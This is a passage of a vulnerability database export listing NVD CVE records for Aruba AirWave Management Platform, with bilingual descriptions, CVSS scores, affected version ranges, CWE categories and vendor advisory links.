      "value": "Se detect\u00f3 una vulnerabilidad de ejecuci\u00f3n de comandos arbitraria autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Unas vulnerabilidades en la CLI de AirWave podr\u00edan permitir a usuarios autenticados remotos ejecutar comandos arbitrarios en el host subyacente.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito podr\u00eda permitir a un atacante ejecutar comandos arbitrarios como root en el sistema operativo subyacente, conllevando a un compromiso total del sistema"
    }
  ],
  "id": "CVE-2021-26962",
  "lastModified": "2024-11-21T05:57:07.793",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T16:15:13.070",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-08-26 20:15
Modified
2024-11-21 06:15
Summary
A remote cross-site scripting (XSS) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.13.0. Aruba has released upgrades for the Aruba AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC2542FB-7589-47CD-B439-D781DB929E11",
              "versionEndExcluding": "8.2.13.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote cross-site scripting (XSS) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.13.0. Aruba has released upgrades for the Aruba AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se ha detectado una vulnerabilidad de tipo cross-site scripting (XSS) remota en Aruba AirWave Management Platform versiones: Anteriores a 8.2.13.0. Aruba ha publicado actualizaciones para Aruba AirWave Management Platform que solucionan esta vulnerabilidad de seguridad."
    }
  ],
  "id": "CVE-2021-37715",
  "lastModified": "2024-11-21T06:15:46.943",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.7,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-08-26T20:15:07.417",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-015.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-015.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-27 17:15
Modified
2024-11-21 04:44
Summary
An administrative application user of or application user with write access to Aruba Airwave VisualRF is able to obtain code execution on the AMP platform. This is possible due to the ability to overwrite a file on disk which is subsequently deserialized by the Java application component.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F8DC880-EF1E-45F3-A0B0-B4E7994C6F58",
              "versionEndExcluding": "8.2.10.1",
              "versionStartIncluding": "8.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An administrative application user of or application user with write access to Aruba Airwave VisualRF is able to obtain code execution on the AMP platform. This is possible due to the ability to overwrite a file on disk which is subsequently deserialized by the Java application component."
    },
    {
      "lang": "es",
      "value": "Un usuario de aplicaci\u00f3n administrativa o un usuario de aplicaci\u00f3n con acceso de escritura en Aruba Airwave VisualRF es capaz de obtener una ejecuci\u00f3n de c\u00f3digo en la plataforma AMP. Esto es posible debido a la capacidad de sobrescribir un archivo en el disco que posteriormente es deserializado por el componente de aplicaci\u00f3n Java."
    }
  ],
  "id": "CVE-2019-5326",
  "lastModified": "2024-11-21T04:44:45.107",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-27T17:15:11.737",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-002.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de inyecci\u00f3n SQL autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;M\u00faltiples vulnerabilidades en la API de AirWave podr\u00edan permitir a un atacante remoto autenticado conducir ataques de inyecci\u00f3n SQL contra la instancia de AirWave.\u0026#xa0;Un atacante podr\u00eda explotar estas vulnerabilidades para obtener y modificar informaci\u00f3n confidencial en la base de datos subyacente"
    }
  ],
  "id": "CVE-2021-26965",
  "lastModified": "2024-11-21T05:57:08.107",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.530",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2014-11-25 15:59
Modified
2024-11-21 02:18
Severity ?
Summary
The web interface in Aruba Networks AirWave before 7.7.14 and 8.x before 8.0.5 allows remote authenticated users to gain privileges and execute arbitrary commands via unspecified vectors.
Impacted products
Vendor Product Version
arubanetworks airwave *
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A2A054F5-64FE-43C0-A057-CEF88CC3A443",
              "versionEndExcluding": "7.7.14",
              "versionStartIncluding": "7.7.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B942A45-CAFB-4375-9E93-559C3EFB88F6",
              "versionEndExcluding": "8.0.5",
              "versionStartIncluding": "8.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The web interface in Aruba Networks AirWave before 7.7.14 and 8.x before 8.0.5 allows remote authenticated users to gain privileges and execute arbitrary commands via unspecified vectors."
    },
    {
      "lang": "es",
      "value": "La interfaz web en Aruba Networks AirWave anterior a 7.7.14 y 8.x anterior a 8.0.5 permite a usuarios remotos autenticados ganar privilegios y ejecutar c\u00f3digo arbitrario a trav\u00e9s de vectores no especificados."
    }
  ],
  "id": "CVE-2014-8368",
  "lastModified": "2024-11-21T02:18:57.707",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-25T15:59:03.780",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/62578"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.arubanetworks.com/support/alerts/aid-11192014.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98871"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/62578"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.arubanetworks.com/support/alerts/aid-11192014.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98871"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2023-09-05 18:15
Modified
2024-11-21 02:26
Summary
Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows VisualRF remote OS command execution and file disclosure by administrative users.
Impacted products
Vendor Product Version
arubanetworks airwave *
hp airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EDF36441-2D75-41BC-99A6-5AFC8B770FA3",
              "versionEndExcluding": "7.7.14.2",
              "versionStartIncluding": "7.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "87381F29-D2F9-4300-BB9F-924197154CE9",
              "versionEndExcluding": "8.0.7",
              "versionStartIncluding": "8.0.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows VisualRF remote OS command execution and file disclosure by administrative users."
    },
    {
      "lang": "es",
      "value": "Aruba AirWave anterior a  7.7.14.2 y 8.x y anterior a 8.0.7 permite la ejecuci\u00f3n remota de comandos del sistema operativo VisualRF y la divulgaci\u00f3n de archivos por parte de usuarios administrativos."
    }
  ],
  "id": "CVE-2015-2201",
  "lastModified": "2024-11-21T02:26:59.383",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-09-05T18:15:08.177",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2023-10-17 20:15
Modified
2024-11-21 08:36
Summary
A vulnerability exists which allows an authenticated attacker to access sensitive information on the AirWave Management Platform web-based management interface. Successful exploitation allows the attacker to gain access to some data that could be further exploited to laterally access devices managed and monitored by the AirWave server.
Impacted products
Vendor Product Version
arubanetworks airwave *
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "50CCD31B-43C0-4487-A2F0-0C4177C6C0B2",
              "versionEndIncluding": "8.2.15.2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5867865B-AE3D-4F9F-8B28-98E0CC1CEBA9",
              "versionEndExcluding": "8.3.0.2",
              "versionStartIncluding": "8.3.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A vulnerability exists which allows an authenticated attacker to access sensitive information on the AirWave Management Platform web-based management interface. Successful exploitation allows the attacker to gain access to some data that could be further exploited to laterally access devices managed and monitored by the AirWave server."
    },
    {
      "lang": "es",
      "value": "Existe una vulnerabilidad que permite a un atacante autenticado acceder a informaci\u00f3n confidencial en la interfaz de administraci\u00f3n basada en web de AirWave Management Platform. La explotaci\u00f3n exitosa permite al atacante obtener acceso a algunos datos que podr\u00edan explotarse a\u00fan m\u00e1s para acceder lateralmente a los dispositivos administrados y monitorizados por el servidor AirWave."
    }
  ],
  "id": "CVE-2023-4896",
  "lastModified": "2024-11-21T08:36:12.677",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 4.0,
        "source": "security-alert@hpe.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-10-17T20:15:10.490",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-015.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-015.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de ejecuci\u00f3n de comandos arbitraria autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Unas vulnerabilidades en la interfaz de administraci\u00f3n basada en web de AirWave podr\u00edan permitir a usuarios autenticados remotos ejecutar comandos arbitrarios en el host subyacente.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito podr\u00eda permitir a un atacante ejecutar comandos arbitrarios como un usuario poco privilegiado en el sistema operativo subyacente, conllevando a un compromiso parcial del sistema"
    }
  ],
  "id": "CVE-2021-26971",
  "lastModified": "2024-11-21T05:57:08.750",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.873",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-28 20:15
Modified
2024-11-21 05:54
Summary
A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de tipo XML external entity remota en Aruba AirWave Management Platform versiones anteriores a la 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25165",
  "lastModified": "2024-11-21T05:54:29.003",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-28T20:15:08.097",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
